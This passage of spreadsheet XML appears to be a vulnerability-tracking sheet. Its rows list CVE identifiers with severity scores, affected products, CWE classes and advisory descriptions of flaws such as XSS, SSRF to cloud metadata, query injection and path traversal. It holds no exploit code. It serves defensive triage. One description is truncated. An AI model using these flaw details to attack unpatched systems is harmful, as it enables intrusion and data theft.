        <v>6.3</v>
      </c>
      <c r="D1617" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1617" s="5" t="inlineStr"/>
      <c r="F1617" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1617" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1617" s="5" t="inlineStr"/>
      <c r="I1617" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1617" s="5" t="inlineStr"/>
      <c r="K1617" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1617" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in the Vega expression function implementation in OpenSearch Dashboards allows a remote authenticated actor with dashboard write permissions to execute arbitrary JavaScript in the context of other users' browser sessions by saving a crafted Vega visualization. The checkForFunctionProperty validation routine failed to recurse into arrays of objects, allowing a function property nested inside an array to bypass validation.</t>
        </is>
      </c>
      <c r="M1617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84942</t>
        </is>
      </c>
    </row>
    <row r="1618">
      <c r="A1618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84969</t>
        </is>
      </c>
      <c r="C1618" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1618" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1618" s="5" t="inlineStr"/>
      <c r="F1618" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1618" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1618" s="5" t="inlineStr">
        <is>
          <t>mongodb:c_driver</t>
        </is>
      </c>
      <c r="I1618" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1618" s="5" t="inlineStr"/>
      <c r="K1618" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1618" s="5" t="inlineStr">
        <is>
          <t>A memory-handling error in the BSON-to-JSON conversion helpers of the MongoDB C Driver can write a small number of bytes past the end of a heap buffer when a binary field is encoded and the output is cut short at a caller-configured length limit. A party who supplies the document content, with no privileges on the application that links the driver, may cause a small amount of data outside the intended buffer to be altered.</t>
        </is>
      </c>
      <c r="M1618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84969</t>
        </is>
      </c>
    </row>
    <row r="1619">
      <c r="A1619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85167</t>
        </is>
      </c>
      <c r="C1619" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1619" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1619" s="5" t="inlineStr"/>
      <c r="F1619" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1619" s="5" t="inlineStr">
        <is>
          <t>elasticsearch</t>
        </is>
      </c>
      <c r="H1619" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I1619" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1619" s="5" t="inlineStr"/>
      <c r="K1619" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1619" s="5" t="inlineStr">
        <is>
          <t>n8n before 2.35.4 and 2.36.x before 2.36.2 contain a query injection vulnerability in the Elasticsearch Document Get All and Google Cloud Firestore Document Query operations, which build their JSON query by interpolating expression values directly into the query string before parsing. A value containing quote and brace characters can close the intended field and introduce new query operators, turning an intended single-document lookup into a full-collection read.</t>
        </is>
      </c>
      <c r="M1619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85167</t>
        </is>
      </c>
    </row>
    <row r="1620">
      <c r="A1620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86079</t>
        </is>
      </c>
      <c r="C1620" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1620" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1620" s="5" t="inlineStr"/>
      <c r="F1620" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1620" s="5" t="inlineStr">
        <is>
          <t>elasticsearch</t>
        </is>
      </c>
      <c r="H1620" s="5" t="inlineStr"/>
      <c r="I1620" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1620" s="5" t="inlineStr"/>
      <c r="K1620" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1620" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Elasticsearch and ElasticSecurity nodes interpolated workflow-controlled index and document identifiers directly into REST request paths. An identifier containing path separators or dot segments could select another index or a cluster administration endpoint under the stored Elasticsearch credential. The affected request construction includes packages/nodes-base/nodes/Elastic/Elasticsearch/GenericFunctions.ts and the missing toPathSegment encoding. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M1620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86079</t>
        </is>
      </c>
    </row>
    <row r="1621">
      <c r="A1621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86590</t>
        </is>
      </c>
      <c r="C1621" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1621" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1621" s="5" t="inlineStr"/>
      <c r="F1621" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1621" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1621" s="5" t="inlineStr"/>
      <c r="I1621" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1621" s="5" t="inlineStr"/>
      <c r="K1621" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1621" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Che versions 7.79.0 through 7.121.0, the dashboard backend's POST /dashboard/api/data/resolver endpoint passes a caller-supplied URL directly to an outbound HTTP GET request with no host filtering. An authenticated user can exploit this server-side request forgery (SSRF) to read responses from internal network addresses, including the cloud instance metadata service (169.254.169.254), loopback interfaces, RFC-1918 private ranges, and in-cluster Kubernetes services. The operator-configured allowlist (spec.devEnvironments.allowedSources.urls) is not consulted. The vulnerability is fixed in version 7.122.0, which adds private-address blocking, IPv4-mapped IPv6 bypass prevention, operator allowlist enforcement, and disables HTTP redirects on the outbound request.</t>
        </is>
      </c>
      <c r="M1621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86590</t>
        </is>
      </c>
    </row>
    <row r="1622">
      <c r="A1622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88859</t>
        </is>
      </c>
      <c r="C1622" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1622" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1622" s="5" t="inlineStr"/>
      <c r="F1622" s="5" t="inlineStr"/>
      <c r="G1622" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1622" s="5" t="inlineStr"/>
      <c r="I1622" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1622" s="5" t="inlineStr"/>
      <c r="K1622" s="5" t="inlineStr">
        <is>
          <t>CWE-84</t>
        </is>
      </c>
      <c r="L1622" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Evolution. A remote attacker can exploit this vulnerability by sending a specially crafted HTML email containing a spoofed vCard control. When a victim clicks on this control, Evolution's trusted JavaScript handler incorrectly assigns an attacker-controlled JavaScript URL to an iframe's source. This action leads to arbitrary JavaScript execution within the mail-viewing context, effectively bypassing the security measures designed to prevent script execution in email content.</t>
        </is>
      </c>
      <c r="M1622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88859</t>
        </is>
      </c>
    </row>
    <row r="1623">
      <c r="A1623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9327</t>
        </is>
      </c>
      <c r="C1623" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D1623" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1623" s="5" t="inlineStr"/>
      <c r="F1623" s="5" t="inlineStr"/>
      <c r="G1623" s="5" t="inlineStr">
        <is>
          <t>ibm, websphere</t>
        </is>
      </c>
      <c r="H1623" s="5" t="inlineStr"/>
      <c r="I1623" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1623" s="5" t="inlineStr"/>
      <c r="K1623" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1623" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 could allow an authenticated user with a low-privilege administrative role to modify security configuration. This could result in information disclosure or denial of service.</t>
        </is>
      </c>
      <c r="M1623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9327</t>
        </is>
      </c>
    </row>
    <row r="1624">
      <c r="A1624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68499</t>
        </is>
      </c>
      <c r="C1624" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D1624" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1624" s="5" t="inlineStr"/>
      <c r="F1624" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1624" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1624" s="5" t="inlineStr"/>
      <c r="I1624" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1624" s="5" t="inlineStr"/>
      <c r="K1624" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L1624" s="5" t="inlineStr">
        <is>
          <t>re2 provides Node.js bindings for Google's RE2 regular expression engine. Prior to 1.25.2, re2's String.prototype.match implementation with a global RE2 pattern that can match the empty string fails to advance its native matching cursor in lib/match.cc, causing an infinite loop and unbounded native memory growth that blocks the event loop and can exhaust host memory. This issue is fixed in 1.25.2.</t>
        </is>
      </c>
      <c r="M1624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68499</t>
        </is>
      </c>
    </row>
    <row r="1625">
      <c r="A1625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71429</t>
        </is>
      </c>
      <c r="C1625" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D1625" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1625" s="5" t="inlineStr"/>
      <c r="F1625" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1625" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1625" s="5" t="inlineStr"/>
      <c r="I1625" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1625" s="5" t="inlineStr"/>
      <c r="K1625" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1625" s="5" t="inlineStr">
        <is>
          <t>stream-json is a micro-library of stream components for processing JSON and JSONC with a minimal memory footprint. Prior to 3.5.0, the path filters pick, ignore, filter, and replace in src/core/filters/filter-base.js recompute the full path string from the nesting stack for every checkable token. Because the stack length equals the current nesting depth and a checkable token is emitted at every level, a depth D document costs O(D²) rather than O(D) to process. The issue is triggered by nesting depth rather than byte volume, including the documented pick({filter: 'data'}) traversal-until-match path, so an application that sends untrusted JSON through a string or RegExp filter can block the Node.js event loop and cause denial of service with a small deeply nested document. The streamArray, streamObject, and streamValues streamers are not affected because they use the constant-time asm.depth getter. This issue is fixed in version 3.5.0.</t>
        </is>
      </c>
      <c r="M1625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71429</t>
        </is>
      </c>
    </row>
    <row r="1626">
      <c r="A1626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71430</t>
        </is>
      </c>
      <c r="C1626" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D1626" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1626" s="5" t="inlineStr"/>
      <c r="F1626" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1626" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1626" s="5" t="inlineStr"/>
      <c r="I1626" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1626" s="5" t="inlineStr"/>
      <c r="K1626" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L1626" s="5" t="inlineStr">
        <is>
          <t>node-re2 p</t>
        </is>
      </c>
      <c r="M1626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71430</t>
        </is>
      </c>
    </row>
    <row r="1627">
      <c r="A1627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81859</t>
        </is>
      </c>
      <c r="C1627" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D1627" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1627" s="5" t="inlineStr"/>
      <c r="F1627" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1627" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1627" s="5" t="inlineStr"/>
      <c r="I1627" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1627" s="5" t="inlineStr"/>
      <c r="K1627" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L1627" s="5" t="inlineStr">
        <is>
          <t>CP4BA - IBM Enterprise Records could allow a local attacker to obtain sensitive information due to the use of a broken or risky cryptographic algorithm.</t>
        </is>
      </c>
      <c r="M1627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81859</t>
        </is>
      </c>
    </row>
    <row r="1628">
      <c r="A1628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86314</t>
        </is>
      </c>
      <c r="C1628" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D1628" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1628" s="5" t="inlineStr"/>
      <c r="F1628" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1628" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H1628" s="5" t="inlineStr"/>
      <c r="I1628" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1628" s="5" t="inlineStr"/>
      <c r="K1628" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1628" s="5" t="inlineStr">
        <is>
          <t>Integer overflow in the source-bounds check in Memory::init() (src/runtime/Memory.cpp) in Samsung walrus on all platforms allows a remote attacker to cause an out-of-bounds heap read and denial of service via a crafted WebAssembly module in which a 32-bit unsigned addition wraps around and bypasses the bounds check.
This issue affects Walrus: ff3bf5ff5c4878f8e5572c9593d303f6bc997443.</t>
        </is>
      </c>
      <c r="M1628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86314</t>
        </is>
      </c>
    </row>
    <row r="1629">
      <c r="A1629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86315</t>
        </is>
      </c>
      <c r="C1629" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D1629" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1629" s="5" t="inlineStr"/>
      <c r="F1629" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1629" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1629" s="5" t="inlineStr"/>
      <c r="I1629" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1629" s="5" t="inlineStr"/>
      <c r="K1629" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="L1629" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write caused by numeric truncation  Samsung Open Source Escargot on Linux x86-64 allows an attacker who can supply JavaScript for execution to corrupt native memory and crash the host process via a crafted class definition whose instance initialization entry count exceeds UINT16_MAX.
This issue affects Escargot: 5dc93606abd42b859045add05d704a038e197359.</t>
        </is>
      </c>
      <c r="M1629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86315</t>
        </is>
      </c>
    </row>
    <row r="1630">
      <c r="A1630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1630" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-24291</t>
        </is>
      </c>
      <c r="C1630" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1630" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1630" s="5" t="inlineStr"/>
      <c r="F1630" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1630" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1630" s="5" t="inlineStr">
        <is>
          <t>versa-networks:versa_director</t>
        </is>
      </c>
      <c r="I1630" s="5" t="inlineStr">
        <is>
          <t>2025-06-19</t>
        </is>
      </c>
      <c r="J1630" s="5" t="inlineStr"/>
      <c r="K1630" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L1630" s="5"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allowing the upload of arbitrary file types. This flaw can be exploited to place a malicious file on disk. 
Versa Networks is not aware of any reported instance where this vulnerability was exploited. Proof of concept for this vulnerability has been disclosed by third party security researchers.  
There are no workarounds to disable the GUI option. Versa recommends that Director be upgraded to one of the remediated software versions.</t>
        </is>
      </c>
      <c r="M1630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-24291</t>
        </is>
      </c>
    </row>
    <row r="1631">
      <c r="A1631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1631" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51684</t>
        </is>
      </c>
      <c r="C1631" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1631" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1631" s="5" t="inlineStr"/>
      <c r="F1631" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1631" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1631" s="5" t="inlineStr"/>
      <c r="I1631" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1631" s="5" t="inlineStr"/>
      <c r="K1631" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1631" s="5" t="inlineStr">
        <is>
          <t>CleverTap Web SDK v1.15.1 is vulnerable to Cross Site Scripting (XSS). The application does not sanitize untrusted data received via window.postMessage before injecting it into the page DOM. An attacker can craft a malicious message that, when processed by renderCustomHtml, results in execution of arbitrary JavaScript in the context of the hosting site.</t>
        </is>
      </c>
      <c r="M1631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51684</t>
        </is>
      </c>
    </row>
    <row r="1632">
      <c r="A1632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18562</t>
        </is>
      </c>
      <c r="C1632" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1632" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1632" s="5" t="inlineStr"/>
      <c r="F1632" s="5" t="inlineStr"/>
      <c r="G1632" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1632" s="5" t="inlineStr"/>
      <c r="I1632" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1632" s="5" t="inlineStr"/>
      <c r="K1632" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1632" s="5" t="inlineStr">
        <is>
          <t>The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via SEO-friendly permalink filter URL segments in versions up to, and including, 1.4.3. This is due to insufficient input sanitization and output escaping in the wp_load_js() function, which reads filter values from the URL path via the url_request extension's parse_url_query() and embeds them into an inline JavaScript string using json_encode() without escaping single quotes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link.</t>
        </is>
      </c>
      <c r="M1632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18562</t>
        </is>
      </c>
    </row>
    <row r="1633">
      <c r="A1633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22029</t>
        </is>
      </c>
      <c r="C1633" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1633" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1633" s="5" t="inlineStr"/>
      <c r="F1633" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1633" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1633" s="5" t="inlineStr">
        <is>
          <t>shopify:react-router, shopify:remix-run\/react</t>
        </is>
      </c>
      <c r="I1633" s="5" t="inlineStr">
        <is>
          <t>2026-01-10</t>
        </is>
      </c>
      <c r="J1633" s="5" t="inlineStr"/>
      <c r="K1633" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1633" s="5" t="inlineStr">
        <is>
          <t>React Router is a router for React. In @remix-run/router version prior to 1.23.2 and react-router 7.0.0 through 7.11.0, React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect. There is no impact if Declarative Mode (&lt;BrowserRouter&gt;) is being used. This issue has been patched in @remix-run/router version 1.23.2 and react-router version 7.12.0.</t>
        </is>
      </c>
      <c r="M1633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22029</t>
        </is>
      </c>
    </row>
    <row r="1634">
      <c r="A1634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32773</t>
        </is>
      </c>
      <c r="C1634" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1634" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1634" s="5" t="inlineStr"/>
      <c r="F1634" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1634" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1634" s="5" t="inlineStr">
        <is>
          <t>apache:spark</t>
        </is>
      </c>
      <c r="I1634" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1634" s="5" t="inlineStr"/>
      <c r="K1634" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="L1634" s="5" t="inlineStr">
        <is>
          <t>There is a lack of XSS escaping in the Spark History Server prior to 3.5.8 which allows a malicious Spark job to generate arbitrary unescaped frontend code which could lead to a minimal privilege escalation in browser. Users are encouraged to upgrade to Spark 3.5.8 or later.
This CVE is marked as "low" since the path to exploit requires both relatively high permissions (ability to launch a Spark job) and requires tricking a user with higher permissions to log in and visit the Spark history web page.
Users are encouraged to upgrade their Spark history servers to Spark 3.5.8 or later.</t>
        </is>
      </c>
      <c r="M1634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32773</t>
        </is>
      </c>
    </row>
    <row r="1635">
      <c r="A1635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47883</t>
        </is>
      </c>
      <c r="C1635" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1635" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1635" s="5" t="inlineStr"/>
      <c r="F1635" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1635" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H1635" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I1635" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1635" s="5" t="inlineStr"/>
      <c r="K1635" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L1635" s="5" t="inlineStr">
        <is>
          <t>UrlHandlerFilter can be vulnerable to an open redirect when configured with very broadly matching patterns. The issue applies to the filter variants in both Spring MVC and Spring WebFlux.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19</t>
        </is>
      </c>
      <c r="M1635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47883</t>
        </is>
      </c>
    </row>
    <row r="1636">
      <c r="A1636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47887</t>
        </is>
      </c>
      <c r="C1636" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D1636" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1636" s="5" t="inlineStr"/>
      <c r="F1636" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1636" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H1636" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I1636" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1636" s="5" t="inlineStr"/>
      <c r="K1636" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L1636" s="5" t="inlineStr">
        <is>
          <t>A Spring MVC application that uses UrlFileNameViewController that is mapped with an end-of-path, and does not have a configured prefix is vulnerable to an open redirect.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.25.RELEASE and earlier</t>
        </is>
      </c>
      <c r="M1636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47887</t>
        </is>
      </c>
    </row>
    <row r="1637">
      <c r="A1637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50980</t>
        </is>
      </c>
      <c r="C1637" s="5" t="n">
        <v>6.1</v>
      </c>
